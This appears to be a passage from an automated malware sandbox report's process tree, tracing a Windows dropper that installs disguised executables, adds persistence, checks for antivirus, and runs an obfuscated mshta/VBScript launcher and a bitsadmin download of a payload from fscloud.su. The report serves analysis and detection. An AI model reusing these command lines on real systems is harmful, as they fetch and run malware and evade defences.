                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                              PID:7836
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1dc,0x1ec,0x7ffef008dec0,0x7ffef008ded0,0x7ffef008dee0
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:9012
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1528 /prefetch:2
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=1856 /prefetch:8
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=2148 /prefetch:8
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:8096
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2544 /prefetch:1
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                        PID:8220
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2468 /prefetch:1
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                        PID:8644
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=3296 /prefetch:8
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:8608
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3244 /prefetch:2
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:9184
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=3380 /prefetch:8
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:8264
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=3624 /prefetch:8
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                PID:9144
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=3288 /prefetch:8
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:2724
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1408,4622983748502179366,15501702363564531143,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7836_851064297" --mojo-platform-channel-handle=436 /prefetch:8
                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                    PID:7860
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\jRCvPA64vDyZu39ZVmGHKFvX.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\jRCvPA64vDyZu39ZVmGHKFvX.exe"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:4280
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-GBORA.tmp\jRCvPA64vDyZu39ZVmGHKFvX.tmp
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-GBORA.tmp\jRCvPA64vDyZu39ZVmGHKFvX.tmp" /SL5="$90388,506127,422400,C:\Users\Admin\Pictures\Adobe Films\jRCvPA64vDyZu39ZVmGHKFvX.exe"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                  PID:1476
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-UAGF1.tmp\DYbALA.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-UAGF1.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                    PID:208
                                                                                                                                                                                                                                                                                                    • C:\Program Files\Windows Security\FUHURPGYFY\foldershare.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files\Windows Security\FUHURPGYFY\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:7160
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4e-cacb1-303-2068e-a658499c7aa87\Xuqaletici.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\4e-cacb1-303-2068e-a658499c7aa87\Xuqaletici.exe"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ed-86c32-d99-1afa7-0cdc5880005a8\Lyshyshenaxy.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ed-86c32-d99-1afa7-0cdc5880005a8\Lyshyshenaxy.exe"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:6188
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sqjlmfmu.a2c\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:7792
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sqjlmfmu.a2c\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\sqjlmfmu.a2c\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                  PID:7432
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hrijb23.gzo\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                  PID:7956
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4hrijb23.gzo\installer.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4hrijb23.gzo\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                      PID:7844
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gq2iogbn.nzb\any.exe & exit
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:8076
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\gq2iogbn.nzb\any.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\gq2iogbn.nzb\any.exe
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:5084
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gq2iogbn.nzb\any.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\gq2iogbn.nzb\any.exe" -u
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:8448
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t3dwy5gk.xby\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:8164
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\t3dwy5gk.xby\gcleaner.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\t3dwy5gk.xby\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                PID:8240
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\waancm2q.5qj\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:4360
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\waancm2q.5qj\autosubplayer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\waancm2q.5qj\autosubplayer.exe /S
                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                  PID:8332
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                      PID:9004
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                        PID:1688
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                          PID:6668
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                            PID:5396
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                              PID:6284
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                PID:7804
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi43A0.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                                                                                PID:1440
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                PID:8480
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\9P7jLVrGZUeAn1EmXolhlKP7.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\9P7jLVrGZUeAn1EmXolhlKP7.exe"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                PID:6348
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\9P7jLVrGZUeAn1EmXolhlKP7.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\9P7jLVrGZUeAn1EmXolhlKP7.exe"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:7032
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\lZqv0AEkz8jL0H9XtyYI8k78.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\lZqv0AEkz8jL0H9XtyYI8k78.exe"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:3324
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\TMEavk4WqX8RDwvGtKxky_e9.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\TMEavk4WqX8RDwvGtKxky_e9.exe"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:6356
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\rFW1lDIv8Z7r0Y6OKJChfnNL.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\rFW1lDIv8Z7r0Y6OKJChfnNL.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:6384
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                      Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                      PID:1956
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        PID:508
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        PID:4380
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        PID:4552
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                      Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      PID:2328
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17afe24e0084db3.exe" -u
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:4140
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-HL2MK.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-HL2MK.tmp\Mon17bbf11fdb575d.tmp" /SL5="$3011A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bbf11fdb575d.exe"
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                        PID:2208
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:2240
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-QBC1A.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-QBC1A.tmp\Mon17bbf11fdb575d.tmp" /SL5="$10206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                              PID:2080
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-MOB8O.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-MOB8O.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4684
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                                                                                                            Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                            PID:3764
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:4464
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 3764 -s 216
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                PID:1772
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:2764
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                                                                      6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                      PID:4432
